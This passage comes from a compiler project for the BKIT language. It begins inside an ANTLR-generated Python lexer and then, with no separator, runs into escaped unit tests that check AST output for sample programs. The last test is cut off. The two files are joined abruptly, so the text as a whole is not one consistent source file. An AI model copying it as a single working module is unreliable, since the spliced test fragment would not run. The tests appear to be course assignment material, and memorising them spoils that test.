buf.write(\"\\7-\\2\\2\\u01b8X\\3\\2\\2\\2\\u01b9\\u01ba\\7-\\2\\2\\u01ba\\u01bb\")\n buf.write(\"\\7\\60\\2\\2\\u01bbZ\\3\\2\\2\\2\\u01bc\\u01bd\\7/\\2\\2\\u01bd\\\\\\3\")\n buf.write(\"\\2\\2\\2\\u01be\\u01bf\\7/\\2\\2\\u01bf\\u01c0\\7\\60\\2\\2\\u01c0^\")\n buf.write(\"\\3\\2\\2\\2\\u01c1\\u01c2\\7,\\2\\2\\u01c2`\\3\\2\\2\\2\\u01c3\\u01c4\")\n buf.write(\"\\7,\\2\\2\\u01c4\\u01c5\\7\\60\\2\\2\\u01c5b\\3\\2\\2\\2\\u01c6\\u01c7\")\n buf.write(\"\\7^\\2\\2\\u01c7d\\3\\2\\2\\2\\u01c8\\u01c9\\7^\\2\\2\\u01c9\\u01ca\")\n buf.write(\"\\7\\60\\2\\2\\u01caf\\3\\2\\2\\2\\u01cb\\u01cc\\7\\'\\2\\2\\u01cch\\3\")\n buf.write(\"\\2\\2\\2\\u01cd\\u01ce\\7#\\2\\2\\u01cej\\3\\2\\2\\2\\u01cf\\u01d0\\7\")\n buf.write(\"(\\2\\2\\u01d0\\u01d1\\7(\\2\\2\\u01d1l\\3\\2\\2\\2\\u01d2\\u01d3\\7\")\n buf.write(\"~\\2\\2\\u01d3\\u01d4\\7~\\2\\2\\u01d4n\\3\\2\\2\\2\\u01d5\\u01d6\\7\")\n buf.write(\"?\\2\\2\\u01d6\\u01d7\\7?\\2\\2\\u01d7p\\3\\2\\2\\2\\u01d8\\u01d9\\7\")\n buf.write(\"#\\2\\2\\u01d9\\u01da\\7?\\2\\2\\u01dar\\3\\2\\2\\2\\u01db\\u01dc\\7\")\n buf.write(\">\\2\\2\\u01dct\\3\\2\\2\\2\\u01dd\\u01de\\7@\\2\\2\\u01dev\\3\\2\\2\\2\")\n buf.write(\"\\u01df\\u01e0\\7>\\2\\2\\u01e0\\u01e1\\7?\\2\\2\\u01e1x\\3\\2\\2\\2\")\n buf.write(\"\\u01e2\\u01e3\\7@\\2\\2\\u01e3\\u01e4\\7?\\2\\2\\u01e4z\\3\\2\\2\\2\")\n buf.write(\"\\u01e5\\u01e6\\7?\\2\\2\\u01e6\\u01e7\\7\\61\\2\\2\\u01e7\\u01e8\\7\")\n buf.write(\"?\\2\\2\\u01e8|\\3\\2\\2\\2\\u01e9\\u01ea\\7>\\2\\2\\u01ea\\u01eb\\7\")\n buf.write(\"\\60\\2\\2\\u01eb~\\3\\2\\2\\2\\u01ec\\u01ed\\7@\\2\\2\\u01ed\\u01ee\")\n buf.write(\"\\7\\60\\2\\2\\u01ee\\u0080\\3\\2\\2\\2\\u01ef\\u01f0\\7>\\2\\2\\u01f0\")\n buf.write(\"\\u01f1\\7?\\2\\2\\u01f1\\u01f2\\7\\60\\2\\2\\u01f2\\u0082\\3\\2\\2\\2\")\n buf.write(\"\\u01f3\\u01f4\\7@\\2\\2\\u01f4\\u01f5\\7?\\2\\2\\u01f5\\u01f6\\7\\60\")\n buf.write(\"\\2\\2\\u01f6\\u0084\\3\\2\\2\\2\\u01f7\\u01f8\\7*\\2\\2\\u01f8\\u0086\")\n 
buf.write(\"\\3\\2\\2\\2\\u01f9\\u01fa\\7+\\2\\2\\u01fa\\u0088\\3\\2\\2\\2\\u01fb\")\n buf.write(\"\\u01fc\\7]\\2\\2\\u01fc\\u008a\\3\\2\\2\\2\\u01fd\\u01fe\\7_\\2\\2\\u01fe\")\n buf.write(\"\\u008c\\3\\2\\2\\2\\u01ff\\u0200\\7}\\2\\2\\u0200\\u008e\\3\\2\\2\\2\")\n buf.write(\"\\u0201\\u0202\\7\\177\\2\\2\\u0202\\u0090\\3\\2\\2\\2\\u0203\\u0204\")\n buf.write(\"\\7<\\2\\2\\u0204\\u0092\\3\\2\\2\\2\\u0205\\u0206\\7\\60\\2\\2\\u0206\")\n buf.write(\"\\u0094\\3\\2\\2\\2\\u0207\\u0208\\7=\\2\\2\\u0208\\u0096\\3\\2\\2\\2\")\n buf.write(\"\\u0209\\u020a\\7.\\2\\2\\u020a\\u0098\\3\\2\\2\\2\\u020b\\u020c\\7\")\n buf.write(\"?\\2\\2\\u020c\\u009a\\3\\2\\2\\2\\u020d\\u020e\\7$\\2\\2\\u020e\\u009c\")\n buf.write(\"\\3\\2\\2\\2\\u020f\\u0210\\7k\\2\\2\\u0210\\u0211\\7p\\2\\2\\u0211\\u0212\")\n buf.write(\"\\7v\\2\\2\\u0212\\u0213\\7a\\2\\2\\u0213\\u0214\\7q\\2\\2\\u0214\\u0215\")\n buf.write(\"\\7h\\2\\2\\u0215\\u0216\\7a\\2\\2\\u0216\\u0217\\7h\\2\\2\\u0217\\u0218\")\n buf.write(\"\\7n\\2\\2\\u0218\\u0219\\7q\\2\\2\\u0219\\u021a\\7c\\2\\2\\u021a\\u021b\")\n buf.write(\"\\7v\\2\\2\\u021b\\u009e\\3\\2\\2\\2\\u021c\\u021d\\7k\\2\\2\\u021d\\u021e\")\n buf.write(\"\\7p\\2\\2\\u021e\\u021f\\7v\\2\\2\\u021f\\u0220\\7a\\2\\2\\u0220\\u0221\")\n buf.write(\"\\7q\\2\\2\\u0221\\u0222\\7h\\2\\2\\u0222\\u0223\\7a\\2\\2\\u0223\\u0224\")\n buf.write(\"\\7u\\2\\2\\u0224\\u0225\\7v\\2\\2\\u0225\\u0226\\7t\\2\\2\\u0226\\u0227\")\n buf.write(\"\\7k\\2\\2\\u0227\\u0228\\7p\\2\\2\\u0228\\u0229\\7i\\2\\2\\u0229\\u00a0\")\n buf.write(\"\\3\\2\\2\\2\\u022a\\u022b\\7h\\2\\2\\u022b\\u022c\\7n\\2\\2\\u022c\\u022d\")\n buf.write(\"\\7q\\2\\2\\u022d\\u022e\\7c\\2\\2\\u022e\\u022f\\7v\\2\\2\\u022f\\u0230\")\n buf.write(\"\\7a\\2\\2\\u0230\\u0231\\7v\\2\\2\\u0231\\u0232\\7q\\2\\2\\u0232\\u0233\")\n buf.write(\"\\7a\\2\\2\\u0233\\u0234\\7k\\2\\2\\u0234\\u0235\\7p\\2\\2\\u0235\\u0236\")\n buf.write(\"\\7v\\2\\2\\u0236\\u00a2\\3\\2\\2\\2\\u0237\\u0238\\7h\\2\\2\\u0238\\u0239\")\n 
buf.write(\"\\7n\\2\\2\\u0239\\u023a\\7q\\2\\2\\u023a\\u023b\\7c\\2\\2\\u023b\\u023c\")\n buf.write(\"\\7v\\2\\2\\u023c\\u023d\\7a\\2\\2\\u023d\\u023e\\7q\\2\\2\\u023e\\u023f\")\n buf.write(\"\\7h\\2\\2\\u023f\\u0240\\7a\\2\\2\\u0240\\u0241\\7u\\2\\2\\u0241\\u0242\")\n buf.write(\"\\7v\\2\\2\\u0242\\u0243\\7t\\2\\2\\u0243\\u0244\\7k\\2\\2\\u0244\\u0245\")\n buf.write(\"\\7p\\2\\2\\u0245\\u0246\\7i\\2\\2\\u0246\\u00a4\\3\\2\\2\\2\\u0247\\u0248\")\n buf.write(\"\\7d\\2\\2\\u0248\\u0249\\7q\\2\\2\\u0249\\u024a\\7q\\2\\2\\u024a\\u024b\")\n buf.write(\"\\7n\\2\\2\\u024b\\u024c\\7a\\2\\2\\u024c\\u024d\\7q\\2\\2\\u024d\\u024e\")\n buf.write(\"\\7h\\2\\2\\u024e\\u024f\\7a\\2\\2\\u024f\\u0250\\7u\\2\\2\\u0250\\u0251\")\n buf.write(\"\\7v\\2\\2\\u0251\\u0252\\7t\\2\\2\\u0252\\u0253\\7k\\2\\2\\u0253\\u0254\")\n buf.write(\"\\7p\\2\\2\\u0254\\u0255\\7i\\2\\2\\u0255\\u00a6\\3\\2\\2\\2\\u0256\\u0257\")\n buf.write(\"\\7u\\2\\2\\u0257\\u0258\\7v\\2\\2\\u0258\\u0259\\7t\\2\\2\\u0259\\u025a\")\n buf.write(\"\\7k\\2\\2\\u025a\\u025b\\7p\\2\\2\\u025b\\u025c\\7i\\2\\2\\u025c\\u025d\")\n buf.write(\"\\7a\\2\\2\\u025d\\u025e\\7q\\2\\2\\u025e\\u025f\\7h\\2\\2\\u025f\\u0260\")\n buf.write(\"\\7a\\2\\2\\u0260\\u0261\\7d\\2\\2\\u0261\\u0262\\7q\\2\\2\\u0262\\u0263\")\n buf.write(\"\\7q\\2\\2\\u0263\\u0264\\7n\\2\\2\\u0264\\u00a8\\3\\2\\2\\2\\u0265\\u0266\")\n buf.write(\"\\7u\\2\\2\\u0266\\u0267\\7v\\2\\2\\u0267\\u0268\\7t\\2\\2\\u0268\\u0269\")\n buf.write(\"\\7k\\2\\2\\u0269\\u026a\\7p\\2\\2\\u026a\\u026b\\7i\\2\\2\\u026b\\u026c\")\n buf.write(\"\\7a\\2\\2\\u026c\\u026d\\7q\\2\\2\\u026d\\u026e\\7h\\2\\2\\u026e\\u026f\")\n buf.write(\"\\7a\\2\\2\\u026f\\u0270\\7k\\2\\2\\u0270\\u0271\\7p\\2\\2\\u0271\\u0272\")\n buf.write(\"\\7v\\2\\2\\u0272\\u00aa\\3\\2\\2\\2\\u0273\\u0274\\7u\\2\\2\\u0274\\u0275\")\n buf.write(\"\\7v\\2\\2\\u0275\\u0276\\7t\\2\\2\\u0276\\u0277\\7k\\2\\2\\u0277\\u0278\")\n buf.write(\"\\7p\\2\\2\\u0278\\u0279\\7i\\2\\2\\u0279\\u027a\\7a\\2\\2\\u027a\\u027b\")\n 
buf.write(\"\\7q\\2\\2\\u027b\\u027c\\7h\\2\\2\\u027c\\u027d\\7a\\2\\2\\u027d\\u027e\")\n buf.write(\"\\7h\\2\\2\\u027e\\u027f\\7n\\2\\2\\u027f\\u0280\\7q\\2\\2\\u0280\\u0281\")\n buf.write(\"\\7c\\2\\2\\u0281\\u0282\\7v\\2\\2\\u0282\\u00ac\\3\\2\\2\\2\\u0283\\u0284\")\n buf.write(\"\\7,\\2\\2\\u0284\\u0285\\7,\\2\\2\\u0285\\u0289\\3\\2\\2\\2\\u0286\\u0288\")\n buf.write(\"\\13\\2\\2\\2\\u0287\\u0286\\3\\2\\2\\2\\u0288\\u028b\\3\\2\\2\\2\\u0289\")\n buf.write(\"\\u028a\\3\\2\\2\\2\\u0289\\u0287\\3\\2\\2\\2\\u028a\\u028c\\3\\2\\2\\2\")\n buf.write(\"\\u028b\\u0289\\3\\2\\2\\2\\u028c\\u028d\\7,\\2\\2\\u028d\\u028e\\7\")\n buf.write(\",\\2\\2\\u028e\\u028f\\3\\2\\2\\2\\u028f\\u0290\\bW\\3\\2\\u0290\\u00ae\")\n buf.write(\"\\3\\2\\2\\2\\u0291\\u0293\\t\\17\\2\\2\\u0292\\u0291\\3\\2\\2\\2\\u0293\")\n buf.write(\"\\u0294\\3\\2\\2\\2\\u0294\\u0292\\3\\2\\2\\2\\u0294\\u0295\\3\\2\\2\\2\")\n buf.write(\"\\u0295\\u0296\\3\\2\\2\\2\\u0296\\u0297\\bX\\3\\2\\u0297\\u00b0\\3\")\n buf.write(\"\\2\\2\\2\\u0298\\u029c\\7$\\2\\2\\u0299\\u029b\\5\\31\\r\\2\\u029a\\u0299\")\n buf.write(\"\\3\\2\\2\\2\\u029b\\u029e\\3\\2\\2\\2\\u029c\\u029a\\3\\2\\2\\2\\u029c\")\n buf.write(\"\\u029d\\3\\2\\2\\2\\u029d\\u029f\\3\\2\\2\\2\\u029e\\u029c\\3\\2\\2\\2\")\n buf.write(\"\\u029f\\u02a0\\5\\23\\n\\2\\u02a0\\u02a1\\bY\\4\\2\\u02a1\\u00b2\\3\")\n buf.write(\"\\2\\2\\2\\u02a2\\u02a6\\7$\\2\\2\\u02a3\\u02a5\\5\\31\\r\\2\\u02a4\\u02a3\")\n buf.write(\"\\3\\2\\2\\2\\u02a5\\u02a8\\3\\2\\2\\2\\u02a6\\u02a4\\3\\2\\2\\2\\u02a6\")\n buf.write(\"\\u02a7\\3\\2\\2\\2\\u02a7\\u02aa\\3\\2\\2\\2\\u02a8\\u02a6\\3\\2\\2\\2\")\n buf.write(\"\\u02a9\\u02ab\\t\\20\\2\\2\\u02aa\\u02a9\\3\\2\\2\\2\\u02ab\\u02ac\")\n buf.write(\"\\3\\2\\2\\2\\u02ac\\u02ad\\bZ\\5\\2\\u02ad\\u00b4\\3\\2\\2\\2\\u02ae\")\n buf.write(\"\\u02af\\7,\\2\\2\\u02af\\u02b0\\7,\\2\\2\\u02b0\\u02b6\\3\\2\\2\\2\\u02b1\")\n buf.write(\"\\u02b2\\7,\\2\\2\\u02b2\\u02b5\\n\\21\\2\\2\\u02b3\\u02b5\\n\\21\\2\")\n 
buf.write(\"\\2\\u02b4\\u02b1\\3\\2\\2\\2\\u02b4\\u02b3\\3\\2\\2\\2\\u02b5\\u02b8\")\n buf.write(\"\\3\\2\\2\\2\\u02b6\\u02b7\\3\\2\\2\\2\\u02b6\\u02b4\\3\\2\\2\\2\\u02b7\")\n buf.write(\"\\u02b9\\3\\2\\2\\2\\u02b8\\u02b6\\3\\2\\2\\2\\u02b9\\u02ba\\7\\2\\2\\3\")\n buf.write(\"\\u02ba\\u00b6\\3\\2\\2\\2\\u02bb\\u02bc\\13\\2\\2\\2\\u02bc\\u00b8\")\n buf.write(\"\\3\\2\\2\\2\\35\\2\\u00be\\u00c0\\u00cb\\u00d0\\u00d5\\u00db\\u00e1\")\n buf.write(\"\\u00e5\\u00e8\\u00f6\\u0100\\u0106\\u010e\\u0111\\u0117\\u011d\")\n buf.write(\"\\u0123\\u0129\\u012f\\u0289\\u0294\\u029c\\u02a6\\u02aa\\u02b4\")\n buf.write(\"\\u02b6\\6\\3\\26\\2\\b\\2\\2\\3Y\\3\\3Z\\4\")\n return buf.getvalue()\n\n\nclass BKITLexer(Lexer):\n\n atn = ATNDeserializer().deserialize(serializedATN())\n\n decisionsToDFA = [ DFA(ds, i) for i, ds in enumerate(atn.decisionToState) ]\n\n ID = 1\n INT_LIT = 2\n FLOAT_LIT = 3\n BOOL_LIT = 4\n STRING_LIT = 5\n BODY = 6\n BREAK = 7\n CONTINUE = 8\n DO = 9\n ELSE = 10\n ELSEIF = 11\n ENDIF = 12\n ENDBODY = 13\n ENDFOR = 14\n ENDWHILE = 15\n FOR = 16\n FUNCTION = 17\n IF = 18\n PARAMETER = 19\n RETURN = 20\n THEN = 21\n VAR = 22\n WHILE = 23\n TRUE = 24\n FALSE = 25\n ENDDO = 26\n PLUS_INT = 27\n PLUS_FLOAT = 28\n MINUS_INT = 29\n MINUS_FLOAT = 30\n STAR_INT = 31\n STAR_FLOAT = 32\n DIV_INT = 33\n DIV_FLOAT = 34\n MOD = 35\n NOT = 36\n AND = 37\n OR = 38\n EQUAL = 39\n NOT_EQUAL_INT = 40\n LESS_INT = 41\n GREATER_INT = 42\n LESS_OR_EQUAL_INT = 43\n GREATER_OR_EQUAL_INT = 44\n NOT_EQUAL_FLOAT = 45\n LESS_FLOAT = 46\n GREATER_FLOAT = 47\n LESS_OR_EQUAL_FLOAT = 48\n GREATER_OR_EQUAL_FLOAT = 49\n LEFT_PAREN = 50\n RIGHT_PAREN = 51\n LEFT_BRACKET = 52\n RIGHT_BRACKET = 53\n LEFT_BRACE = 54\n RIGHT_BRACE = 55\n COLON = 56\n DOT = 57\n SEMI = 58\n COMMA = 59\n ASSIGN = 60\n DOUBLE_QUOTE = 61\n INT_OF_FLOAT = 62\n INT_OF_STRING = 63\n FLOAT_TO_INT = 64\n FLOAT_OF_STRING = 65\n BOOL_OF_STRING = 66\n STRING_OF_BOOL = 67\n STRING_OF_INT = 68\n STRING_OF_FLOAT = 69\n COMMENT = 70\n 
    # Token-type constants (continued).  The four types below are never
    # returned to the parser: emit() converts each of them into a raised
    # lexer exception instead (see emit() further down).
    WS = 71
    ILLEGAL_ESCAPE = 72
    UNCLOSE_STRING = 73
    UNTERMINATED_COMMENT = 74
    ERROR_CHAR = 75

    # Token channels used by the lexer (ANTLR's default channel + hidden).
    channelNames = [ u"DEFAULT_TOKEN_CHANNEL", u"HIDDEN" ]

    # Lexer modes; this grammar uses only the default mode.
    modeNames = [ "DEFAULT_MODE" ]

    # Literal spellings of the fixed tokens (keywords, operators,
    # separators), indexed by token type.  Generated by ANTLR from
    # BKIT.g4 -- do not edit by hand.
    literalNames = [ "<INVALID>",
            "'Body'", "'Break'", "'Continue'", "'Do'", "'Else'", "'ElseIf'", 
            "'EndIf'", "'EndBody'", "'EndFor'", "'EndWhile'", "'For'", "'Function'", 
            "'If'", "'Parameter'", "'Return'", "'Then'", "'Var'", "'While'", 
            "'True'", "'False'", "'EndDo'", "'+'", "'+.'", "'-'", "'-.'", 
            "'*'", "'*.'", "'\\'", "'\\.'", "'%'", "'!'", "'&&'", "'||'", 
            "'=='", "'!='", "'<'", "'>'", "'<='", "'>='", "'=/='", "'<.'", 
            "'>.'", "'<=.'", "'>=.'", "'('", "')'", "'['", "']'", "'{'", 
            "'}'", "':'", "'.'", "';'", "','", "'='", "'\"'", "'int_of_float'", 
            "'int_of_string'", "'float_to_int'", "'float_of_string'", "'bool_of_string'", 
            "'string_of_bool'", "'string_of_int'", "'string_of_float'" ]

    # Symbolic token names, indexed by token type (parallel to the
    # ID..ERROR_CHAR integer constants above).  Generated -- do not edit.
    symbolicNames = [ "<INVALID>",
            "ID", "INT_LIT", "FLOAT_LIT", "BOOL_LIT", "STRING_LIT", "BODY", 
            "BREAK", "CONTINUE", "DO", "ELSE", "ELSEIF", "ENDIF", "ENDBODY", 
            "ENDFOR", "ENDWHILE", "FOR", "FUNCTION", "IF", "PARAMETER", 
            "RETURN", "THEN", "VAR", "WHILE", "TRUE", "FALSE", "ENDDO", 
            "PLUS_INT", "PLUS_FLOAT", "MINUS_INT", "MINUS_FLOAT", "STAR_INT", 
            "STAR_FLOAT", "DIV_INT", "DIV_FLOAT", "MOD", "NOT", "AND", "OR", 
            "EQUAL", "NOT_EQUAL_INT", "LESS_INT", "GREATER_INT", "LESS_OR_EQUAL_INT", 
            "GREATER_OR_EQUAL_INT", "NOT_EQUAL_FLOAT", "LESS_FLOAT", "GREATER_FLOAT", 
            "LESS_OR_EQUAL_FLOAT", "GREATER_OR_EQUAL_FLOAT", "LEFT_PAREN", 
            "RIGHT_PAREN", "LEFT_BRACKET", "RIGHT_BRACKET", "LEFT_BRACE", 
            "RIGHT_BRACE", "COLON", "DOT", "SEMI", "COMMA", "ASSIGN", "DOUBLE_QUOTE", 
            "INT_OF_FLOAT", "INT_OF_STRING", "FLOAT_TO_INT", "FLOAT_OF_STRING", 
            "BOOL_OF_STRING", "STRING_OF_BOOL", "STRING_OF_INT", "STRING_OF_FLOAT", 
            "COMMENT", "WS", "ILLEGAL_ESCAPE", "UNCLOSE_STRING", "UNTERMINATED_COMMENT", 
            "ERROR_CHAR" ]

    # Grammar rule names, indexed by rule number.  The indices used in
    # action() below refer to this list (20 = STRING_LIT, 87/88 are the
    # ILLEGAL_ESCAPE / UNCLOSE_STRING error rules).  Generated -- do not edit.
    ruleNames = [ "ID", "LOWERCASE_LETTER", "UPPERCASE_LETTER", "DIGIT", 
                  "LETTER", "SCIENTIFIC", "DECIMAL_POINT", "FLOATING_POINT_NUM", 
                  "ILL_ESC_SEQUENCE", "SUP_ESC_SEQUENCE", "DOUBLE_QUOTE_IN_STRING", 
                  "STRING_CHAR", "HEXADECIMALDIGIT", "OCTALDIGIT", "HEXADECIMAL", 
                  "DECIMAL", "OCTAL", "INT_LIT", "FLOAT_LIT", "BOOL_LIT", 
                  "STRING_LIT", "BODY", "BREAK", "CONTINUE", "DO", "ELSE", 
                  "ELSEIF", "ENDIF", "ENDBODY", "ENDFOR", "ENDWHILE", "FOR", 
                  "FUNCTION", "IF", "PARAMETER", "RETURN", "THEN", "VAR", 
                  "WHILE", "TRUE", "FALSE", "ENDDO", "PLUS_INT", "PLUS_FLOAT", 
                  "MINUS_INT", "MINUS_FLOAT", "STAR_INT", "STAR_FLOAT", 
                  "DIV_INT", "DIV_FLOAT", "MOD", "NOT", "AND", "OR", "EQUAL", 
                  "NOT_EQUAL_INT", "LESS_INT", "GREATER_INT", "LESS_OR_EQUAL_INT", 
                  "GREATER_OR_EQUAL_INT", "NOT_EQUAL_FLOAT", "LESS_FLOAT", 
                  "GREATER_FLOAT", "LESS_OR_EQUAL_FLOAT", "GREATER_OR_EQUAL_FLOAT", 
                  "LEFT_PAREN", "RIGHT_PAREN", "LEFT_BRACKET", "RIGHT_BRACKET", 
                  "LEFT_BRACE", "RIGHT_BRACE", "COLON", "DOT", "SEMI", "COMMA", 
                  "ASSIGN", "DOUBLE_QUOTE", "INT_OF_FLOAT", "INT_OF_STRING", 
                  "FLOAT_TO_INT", "FLOAT_OF_STRING", "BOOL_OF_STRING", "STRING_OF_BOOL", 
                  "STRING_OF_INT", "STRING_OF_FLOAT", "COMMENT", "WS", "ILLEGAL_ESCAPE", 
                  "UNCLOSE_STRING", "UNTERMINATED_COMMENT", "ERROR_CHAR" ]

    # Source grammar this lexer was generated from.
    grammarFileName = "BKIT.g4"

    def __init__(self, input=None, output:TextIO = sys.stdout):
        """Set up the generated ATN-driven lexer over the given input stream.

        ``input`` is the character stream to tokenize; ``output`` is where
        the runtime writes diagnostics (defaults to stdout).
        """
        super().__init__(input, output)
        # Generated against the ANTLR 4.8 runtime; a version mismatch warns.
        self.checkVersion("4.8")
        self._interp = LexerATNSimulator(self, self.atn, self.decisionsToDFA, PredictionContextCache())
        # Lazily-built dispatch table for action(); populated on first use.
        self._actions = None
        self._predicates = None


    def emit(self):
        """Emit the next token, converting error token types into exceptions.

        Overrides the runtime's ``Lexer.emit``.  For ordinary tokens the
        superclass result is returned unchanged.  For the four error token
        types an exception carrying the offending text is raised instead:

        - UNCLOSE_STRING         -> UncloseString(token text)
        - ILLEGAL_ESCAPE         -> IllegalEscape(token text)
        - ERROR_CHAR             -> ErrorToken(token text)
        - UNTERMINATED_COMMENT   -> UnterminatedComment()

        NOTE(review): the exception classes are defined elsewhere in the
        project (not visible in this file); presumably they are imported by
        the generated header section of this module -- verify.
        """
        tk = self.type
        result = super().emit()
        if tk == self.UNCLOSE_STRING: 
            raise UncloseString(result.text)
        elif tk == self.ILLEGAL_ESCAPE:
            raise IllegalEscape(result.text)
        elif tk == self.ERROR_CHAR:
            raise ErrorToken(result.text)
        elif tk == self.UNTERMINATED_COMMENT:
            raise UnterminatedComment()
        else:
            return result;


    def action(self, localctx:RuleContext, ruleIndex:int, actionIndex:int):
        """Dispatch a grammar-embedded action for the rule being matched.

        Called by the ATN simulator whenever a rule with an embedded action
        finishes.  The dispatch table maps rule indices (see ``ruleNames``)
        to bound methods: 20 -> STRING_LIT_action, 87 -> ILLEGAL_ESCAPE_action,
        88 -> UNCLOSE_STRING_action.  Raises Exception for any other index,
        since no other rule registers an action.
        """
        if self._actions is None:
            actions = dict()
            actions[20] = self.STRING_LIT_action 
            actions[87] = self.ILLEGAL_ESCAPE_action 
            actions[88] = self.UNCLOSE_STRING_action 
            self._actions = actions
        action = self._actions.get(ruleIndex, None)
        if action is not None:
            action(localctx, actionIndex)
        else:
            raise Exception("No registered action for:" + str(ruleIndex))


    def STRING_LIT_action(self, localctx:RuleContext , actionIndex:int):
        """Embedded action for STRING_LIT: drop the first and last characters
        of the matched text (the enclosing double quotes, per the grammar) so
        the token carries only the string body."""
        if actionIndex == 0:

            y = str(self.text)
            self.text = y[1:-1]
        
        

    def ILLEGAL_ESCAPE_action(self, localctx:RuleContext , actionIndex:int):
        """Embedded action for ILLEGAL_ESCAPE: drop the first character of the
        matched text (the opening quote) before emit() raises IllegalEscape
        with the remainder."""
        if actionIndex == 1:

            y = str(self.text)
            self.text = y[1:]
        
        

    def UNCLOSE_STRING_action(self, localctx:RuleContext , actionIndex:int):
        """Embedded action for UNCLOSE_STRING: drop the first character of the
        matched text (the opening quote) before emit() raises UncloseString
        with the remainder."""
        if actionIndex == 2:

            y = str(self.text)
            self.text = y[1:]
        
        
test_348(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nDo something(); While a && bool_of_string(\"True\") EndDo.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"&&\"\"\",Id('a'),CallExpr(Id('bool_of_string'),[StringLiteral(\"\"\"True\"\"\")])))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,348))\n\n\tdef test_304(self):\n\t\tinput = \"\"\"Var:x[1] = {1};\"\"\"\n\t\texpect = Program([VarDecl(Id('x'),[1],ArrayLiteral([IntLiteral(1)]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,304))\n\n\tdef test_311(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n EndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([],[]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,311))\n\n\tdef test_333(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nParameter: a\nBody:\nVar: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\nFor (i=1, i<3, 2) Do something(); EndFor.\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None)],([VarDecl(Id('x'),[],IntLiteral(1)),VarDecl(Id('a'),[1],ArrayLiteral([IntLiteral(12),StringLiteral(\"\"\"asdf\"\"\")])),VarDecl(Id('a'),[],ArrayLiteral([IntLiteral(12),FloatLiteral(1200000.0),BooleanLiteral(True),IntLiteral(18)]))],[For(Id('i'),IntLiteral(1),BinaryOp(\"\"\"<\"\"\",Id('i'),IntLiteral(3)),IntLiteral(2),([],[CallStmt(Id('something'),[])]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,333))\n\n\tdef test_372(self):\n\t\tinput = \"\"\"Var: a,b,c;\nFunction: main\nBody:\na = b[something()[a[1]] + 1][c + d < 1] + c *. 
d[1.][21 * 0x21A];\nEndBody.\"\"\"\n\t\texpect = Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[],([],[Assign(Id('a'),BinaryOp(\"\"\"+\"\"\",ArrayCell(Id('b'),[BinaryOp(\"\"\"+\"\"\",ArrayCell(CallExpr(Id('something'),[]),[ArrayCell(Id('a'),[IntLiteral(1)])]),IntLiteral(1)),BinaryOp(\"\"\"<\"\"\",BinaryOp(\"\"\"+\"\"\",Id('c'),Id('d')),IntLiteral(1))]),BinaryOp(\"\"\"*.\"\"\",Id('c'),ArrayCell(Id('d'),[FloatLiteral(1.0),BinaryOp(\"\"\"*\"\"\",IntLiteral(21),IntLiteral(538))]))))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,372))\n\n\tdef test_381(self):\n\t\tinput = \"\"\"Function: main\nParameter: a, b[1][100]\nBody:\nWhile a<b Do\nIf a > b Then doNothing(); Break;\nElseIf !somecon() Then doSomething();\nElse Do something(); While a + foo()[100] EndDo.\nEndIf.\nEndWhile.\nEndBody.\"\"\"\n\t\texpect = Program([FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('b'),[1,100],None)],([],[While(BinaryOp(\"\"\"<\"\"\",Id('a'),Id('b')),([],[If([(BinaryOp(\"\"\">\"\"\",Id('a'),Id('b')),[],[CallStmt(Id('doNothing'),[]),Break()]),(UnaryOp(\"\"\"!\"\"\",CallExpr(Id('somecon'),[])),[],[CallStmt(Id('doSomething'),[])])],([],[Dowhile(([],[CallStmt(Id('something'),[])]),BinaryOp(\"\"\"+\"\"\",Id('a'),ArrayCell(CallExpr(Id('foo'),[]),[IntLiteral(100)])))]))]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,381))\n\n\tdef test_395(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a, a[1][12]\n Body:\n If expr Then \n ElseIf expr Then\n While expr Do EndWhile.\n Do Return; While {{}} EndDo.\n Else\n EndIf.\n EndBody.\"\"\"\n\t\texpect = 
Program([VarDecl(Id('a'),[],None),VarDecl(Id('b'),[],None),VarDecl(Id('c'),[],None),FuncDecl(Id('main'),[VarDecl(Id('a'),[],None),VarDecl(Id('a'),[1,12],None)],([],[If([(Id('expr'),[],[]),(Id('expr'),[],[While(Id('expr'),([],[])),Dowhile(([],[Return(None)]),ArrayLiteral([ArrayLiteral([])]))])],([],[]))]))])\n\t\tself.assertTrue(TestAST.checkASTGen(input,expect,395))\n\n\tdef test_339(self):\n\t\tinput = \"\"\"Var: a,b,c;\n Function: main\n Parameter: a\n Body:\n Var: x=1,a[1]={12, \"asdf\"},a={12,12.e5,True,0x12};\n For (i = 0x12, a < 2, i + foo() + 1) Do something();\n c = a[23][b[1][2][c]] +. 12; \n EndFor.\n EndBody.\"\"\"\n\t\texpect = 